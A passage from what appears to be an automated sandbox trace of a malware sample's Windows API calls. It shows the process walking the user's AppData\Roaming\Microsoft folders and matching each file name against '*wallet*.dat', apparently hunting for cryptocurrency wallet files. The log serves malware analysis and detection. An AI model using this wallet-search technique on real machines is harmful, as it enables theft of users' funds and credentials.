ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x54256, dwReserved1=0x207d0, cFileName=".", cAlternateFileName="")) returned 0x6e1ba0 [0234.695] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0234.695] FindNextFileA (in: hFindFile=0x6e1ba0, lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x54256, dwReserved1=0x207d0, cFileName="..", cAlternateFileName="")) returned 1 [0234.695] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0234.695] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0234.695] FindNextFileA (in: hFindFile=0x6e1ba0, lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x54256, dwReserved1=0x207d0, cFileName="..", cAlternateFileName="")) returned 0 [0234.695] FindClose (in: hFindFile=0x6e1ba0 | out: hFindFile=0x6e1ba0) returned 1 [0234.695] FindNextFileA (in: hFindFile=0x6e1660, lpFindFileData=0x197ddc | out: lpFindFileData=0x197ddc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x816a7a21, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x816a7a21, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x816a7a21, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x54256, cFileName="Document Building Blocks", cAlternateFileName="DOCUME~1")) returned 1 [0234.696] StrCmpCA (pszStr1="Document Building Blocks", pszStr2=".") returned 22 [0234.696] StrCmpCA (pszStr1="Document Building Blocks", pszStr2="..") returned 22 [0234.696] wsprintfA (in: param_1=0x197bcc, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks") returned 72 [0234.696] StrCmpCA (pszStr1="Microsoft", pszStr2="") returned 77 [0234.696] wsprintfA (in: param_1=0x197cd4, param_2="%s\\%s" | out: param_1="Microsoft\\Document Building Blocks") returned 34 [0234.696] PathMatchSpecA (pszFile="Document Building Blocks", pszSpec="*wallet*.dat") returned 0 [0234.696] wsprintfA (in: param_1=0x19789c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*") returned 74 [0234.696] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*", lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x816a7a21, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x816a7a21, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x81712f94, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x54256, dwReserved1=0x207d0, cFileName=".", cAlternateFileName="")) returned 0x6e16e0 [0234.697] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0234.697] FindNextFileA (in: hFindFile=0x6e16e0, lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x816a7a21, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x816a7a21, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x81712f94, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x54256, dwReserved1=0x207d0, cFileName="..", cAlternateFileName="")) returned 1 [0234.697] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0234.697] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0234.697] FindNextFileA (in: hFindFile=0x6e16e0, lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81712f94, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x81712f94, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x81712f94, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x54256, dwReserved1=0x207d0, cFileName="1033", cAlternateFileName="")) returned 1 [0234.697] StrCmpCA (pszStr1="1033", pszStr2=".") returned 3 [0234.697] StrCmpCA (pszStr1="1033", pszStr2="..") returned 3 [0234.697] wsprintfA (in: param_1=0x197544, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033") returned 77 [0234.697] StrCmpCA (pszStr1="Microsoft\\Document Building Blocks", pszStr2="") returned 77 [0234.697] wsprintfA (in: param_1=0x19764c, param_2="%s\\%s" | out: param_1="Microsoft\\Document Building Blocks\\1033") returned 39 [0234.698] PathMatchSpecA (pszFile="1033", pszSpec="*wallet*.dat") returned 0 [0234.698] wsprintfA (in: param_1=0x197214, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*") returned 79 [0234.698] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*", lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81712f94, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x81712f94, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x81712f94, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x6e16a0 [0234.698] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0234.698] FindNextFileA (in: hFindFile=0x6e16a0, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81712f94, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x81712f94, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x81712f94, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0234.698] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0234.698] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0234.698] FindNextFileA (in: hFindFile=0x6e16a0, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81712f94, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x81712f94, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x81712f94, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="16", cAlternateFileName="")) returned 1 [0234.698] StrCmpCA (pszStr1="16", pszStr2=".") returned 3 [0234.698] StrCmpCA (pszStr1="16", pszStr2="..") returned 3 [0234.698] wsprintfA (in: param_1=0x196ebc, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16") returned 80 [0234.698] StrCmpCA (pszStr1="Microsoft\\Document Building Blocks\\1033", pszStr2="") returned 77 [0234.698] wsprintfA (in: param_1=0x196fc4, param_2="%s\\%s" | out: param_1="Microsoft\\Document Building Blocks\\1033\\16") returned 42 [0234.698] PathMatchSpecA (pszFile="16", pszSpec="*wallet*.dat") returned 0 [0234.698] wsprintfA (in: param_1=0x196b8c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\*") returned 82 [0234.698] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\*", lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81712f94, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x81712f94, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x817190ef, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3, dwReserved1=0x6b0260, cFileName=".", cAlternateFileName="")) returned 0x6e17a0 [0234.699] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0234.699] FindNextFileA (in: hFindFile=0x6e17a0, lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81712f94, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x81712f94, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x817190ef, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3, dwReserved1=0x6b0260, cFileName="..", cAlternateFileName="")) returned 1 [0234.699] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0234.699] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0234.699] FindNextFileA (in: hFindFile=0x6e17a0, lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x817190ef, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x817190ef, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5ca4c63b, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x388cc7, dwReserved0=0x3, dwReserved1=0x6b0260, cFileName="Built-In Building Blocks.dotx", cAlternateFileName="BUILT-~1.DOT")) returned 1 [0234.699] StrCmpCA (pszStr1="Built-In Building Blocks.dotx", pszStr2=".") returned 20 [0234.699] StrCmpCA (pszStr1="Built-In Building Blocks.dotx", pszStr2="..") returned 20 [0234.699] wsprintfA (in: param_1=0x196834, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx") returned 110 [0234.699] StrCmpCA (pszStr1="Microsoft\\Document Building Blocks\\1033\\16", pszStr2="") returned 77 [0234.699] wsprintfA (in: param_1=0x19693c, param_2="%s\\%s" | out: param_1="Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx") returned 72 [0234.699] PathMatchSpecA (pszFile="Built-In Building Blocks.dotx", pszSpec="*wallet*.dat") returned 0 [0234.699] wsprintfA (in: param_1=0x196504, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx\\*") returned 112 [0234.699] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx\\*", lpFindFileData=0x1963bc | out: lpFindFileData=0x1963bc*(dwFileAttributes=0x817190ef, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x817190ef, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x5ca4c63b, ftLastWriteTime.dwLowDateTime=0x1d705ed, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x388cc7, nFileSizeLow=0x3, dwReserved0=0x6b0260, dwReserved1=0x750042, cFileName="i", cAlternateFileName="C")) returned 0xffffffff [0234.699] FindNextFileA (in: hFindFile=0x6e17a0, lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x817190ef, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x817190ef, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5ca4c63b, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x388cc7, dwReserved0=0x3, dwReserved1=0x6b0260, cFileName="Built-In Building Blocks.dotx", cAlternateFileName="BUILT-~1.DOT")) returned 0 [0234.700] FindClose (in: hFindFile=0x6e17a0 | out: hFindFile=0x6e17a0) returned 1 [0234.700] FindNextFileA (in: hFindFile=0x6e16a0, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81712f94, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x81712f94, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x81712f94, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="16", cAlternateFileName="")) returned 0 [0234.700] FindClose (in: hFindFile=0x6e16a0 | out: hFindFile=0x6e16a0) returned 1 [0234.700] FindNextFileA (in: hFindFile=0x6e16e0, lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81712f94, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x81712f94, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x81712f94, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x54256, dwReserved1=0x207d0, cFileName="1033", cAlternateFileName="")) returned 0 [0234.700] FindClose (in: hFindFile=0x6e16e0 | out: hFindFile=0x6e16e0) returned 1 [0234.700] FindNextFileA (in: hFindFile=0x6e1660, lpFindFileData=0x197ddc | out: lpFindFileData=0x197ddc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa92f1c4e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x31c6a486, ftLastAccessTime.dwHighDateTime=0x1d7b063, ftLastWriteTime.dwLowDateTime=0x31c6a486, ftLastWriteTime.dwHighDateTime=0x1d7b063, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x54256, cFileName="Excel", cAlternateFileName="")) returned 1 [0234.700] StrCmpCA (pszStr1="Excel", pszStr2=".") returned 23 [0234.700] StrCmpCA (pszStr1="Excel", pszStr2="..") returned 23 [0234.700] wsprintfA (in: param_1=0x197bcc, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Excel") returned 53 [0234.700] StrCmpCA (pszStr1="Microsoft", pszStr2="") returned 77 [0234.700] wsprintfA (in: param_1=0x197cd4, param_2="%s\\%s" | out: param_1="Microsoft\\Excel") returned 15 [0234.700] PathMatchSpecA (pszFile="Excel", pszSpec="*wallet*.dat") returned 0 [0234.700] wsprintfA (in: param_1=0x19789c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Excel\\*") returned 55 [0234.700] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Excel\\*", lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa92f1c4e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x31c6a486, ftLastAccessTime.dwHighDateTime=0x1d7b063, ftLastWriteTime.dwLowDateTime=0x934f7bb4, ftLastWriteTime.dwHighDateTime=0x1d7b063, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x207d0, cFileName=".", cAlternateFileName="")) returned 0x6e17e0 [0234.701] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0234.701] FindNextFileA (in: hFindFile=0x6e17e0, lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa92f1c4e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x31c6a486, ftLastAccessTime.dwHighDateTime=0x1d7b063, ftLastWriteTime.dwLowDateTime=0x934f7bb4, ftLastWriteTime.dwHighDateTime=0x1d7b063, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x207d0, cFileName="..", cAlternateFileName="")) returned 1 [0234.701] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0234.701] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0234.701] FindNextFileA (in: hFindFile=0x6e17e0, lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x934f7bb4, ftCreationTime.dwHighDateTime=0x1d7b063, ftLastAccessTime.dwLowDateTime=0x934f7bb4, ftLastAccessTime.dwHighDateTime=0x1d7b063, ftLastWriteTime.dwLowDateTime=0x934f7bb4, ftLastWriteTime.dwHighDateTime=0x1d7b063, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x207d0, cFileName="XLSTART", cAlternateFileName="")) returned 1 [0234.701] StrCmpCA (pszStr1="XLSTART", pszStr2=".") returned 42 [0234.701] StrCmpCA (pszStr1="XLSTART", pszStr2="..") returned 42 [0234.701] wsprintfA (in: param_1=0x197544, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART") returned 61 [0234.701] StrCmpCA (pszStr1="Microsoft\\Excel", pszStr2="") returned 77 [0234.701] wsprintfA (in: param_1=0x19764c, param_2="%s\\%s" | out: param_1="Microsoft\\Excel\\XLSTART") returned 23 [0234.701] PathMatchSpecA (pszFile="XLSTART", pszSpec="*wallet*.dat") returned 0 [0234.701] wsprintfA (in: param_1=0x197214, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*") returned 63 [0234.701] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*", lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x934f7bb4, ftCreationTime.dwHighDateTime=0x1d7b063, ftLastAccessTime.dwLowDateTime=0x934f7bb4, ftLastAccessTime.dwHighDateTime=0x1d7b063, ftLastWriteTime.dwLowDateTime=0x934f7bb4, ftLastWriteTime.dwHighDateTime=0x1d7b063, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x6e1da0 [0234.703] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0234.703] FindNextFileA (in: hFindFile=0x6e1da0, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x934f7bb4, ftCreationTime.dwHighDateTime=0x1d7b063, ftLastAccessTime.dwLowDateTime=0x934f7bb4, ftLastAccessTime.dwHighDateTime=0x1d7b063, ftLastWriteTime.dwLowDateTime=0x934f7bb4, ftLastWriteTime.dwHighDateTime=0x1d7b063, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0234.703] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0234.703] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0234.703] FindNextFileA (in: hFindFile=0x6e1da0, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x934f7bb4, ftCreationTime.dwHighDateTime=0x1d7b063, ftLastAccessTime.dwLowDateTime=0x934f7bb4, ftLastAccessTime.dwHighDateTime=0x1d7b063, ftLastWriteTime.dwLowDateTime=0x934f7bb4, ftLastWriteTime.dwHighDateTime=0x1d7b063, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 0 [0234.703] FindClose (in: hFindFile=0x6e1da0 | out: hFindFile=0x6e1da0) returned 1 [0234.703] FindNextFileA (in: hFindFile=0x6e17e0, lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x934f7bb4, ftCreationTime.dwHighDateTime=0x1d7b063, ftLastAccessTime.dwLowDateTime=0x934f7bb4, ftLastAccessTime.dwHighDateTime=0x1d7b063, ftLastWriteTime.dwLowDateTime=0x934f7bb4, ftLastWriteTime.dwHighDateTime=0x1d7b063, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x207d0, cFileName="XLSTART", cAlternateFileName="")) returned 0 [0234.703] FindClose (in: hFindFile=0x6e17e0 | out: hFindFile=0x6e17e0) returned 1 [0234.703] FindNextFileA (in: hFindFile=0x6e1660, lpFindFileData=0x197ddc | out: lpFindFileData=0x197ddc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3cefc6a2, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0234.703] StrCmpCA (pszStr1="Internet Explorer", pszStr2=".") returned 27 [0234.703] StrCmpCA (pszStr1="Internet Explorer", pszStr2="..") returned 27 [0234.703] wsprintfA (in: param_1=0x197bcc, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer") returned 65 [0234.704] StrCmpCA (pszStr1="Microsoft", pszStr2="") returned 77 [0234.704] wsprintfA (in: param_1=0x197cd4, param_2="%s\\%s" | out: param_1="Microsoft\\Internet Explorer") returned 27 [0234.704] PathMatchSpecA (pszFile="Internet Explorer", pszSpec="*wallet*.dat") returned 0 [0234.704] wsprintfA (in: param_1=0x19789c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*") returned 67 [0234.704] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x207d0, cFileName=".", cAlternateFileName="")) returned 0x6e18e0 [0234.704] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0234.704] FindNextFileA (in: hFindFile=0x6e18e0, lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x207d0, cFileName="..", cAlternateFileName="")) returned 1 [0234.704] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0234.705] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0234.705] FindNextFileA (in: hFindFile=0x6e18e0, lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6654de95, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x6654de95, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x207d0, cFileName="Quick Launch", cAlternateFileName="QUICKL~1")) returned 1 [0234.705] StrCmpCA (pszStr1="Quick Launch", pszStr2=".") returned 35 [0234.705] StrCmpCA (pszStr1="Quick Launch", pszStr2="..") returned 35 [0234.705] wsprintfA (in: param_1=0x197544, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch") returned 78 [0234.705] StrCmpCA (pszStr1="Microsoft\\Internet Explorer", pszStr2="") returned 77 [0234.705] wsprintfA (in: param_1=0x19764c, param_2="%s\\%s" | out: param_1="Microsoft\\Internet Explorer\\Quick Launch") returned 40 [0234.705] PathMatchSpecA (pszFile="Quick Launch", pszSpec="*wallet*.dat") returned 0 [0234.705] wsprintfA (in: param_1=0x197214, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*") returned 80 [0234.705] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*", lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6654de95, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x6654de95, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x196dc8, dwReserved1=0x1, cFileName=".", cAlternateFileName="")) returned 0x6e1aa0 [0234.705] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0234.705] FindNextFileA (in: hFindFile=0x6e1aa0, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6654de95, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x6654de95, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x196dc8, dwReserved1=0x1, cFileName="..", cAlternateFileName="")) returned 1 [0234.705] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0234.705] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0234.705] FindNextFileA (in: hFindFile=0x6e1aa0, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d053a9f, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d053a9f, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x9ee78381, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x94, dwReserved0=0x196dc8, dwReserved1=0x1, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0234.706] StrCmpCA (pszStr1="desktop.ini", pszStr2=".") returned 54 [0234.706] StrCmpCA (pszStr1="desktop.ini", pszStr2="..") returned 54 [0234.706] wsprintfA (in: param_1=0x196ebc, param_2="%s\\%s" | out: 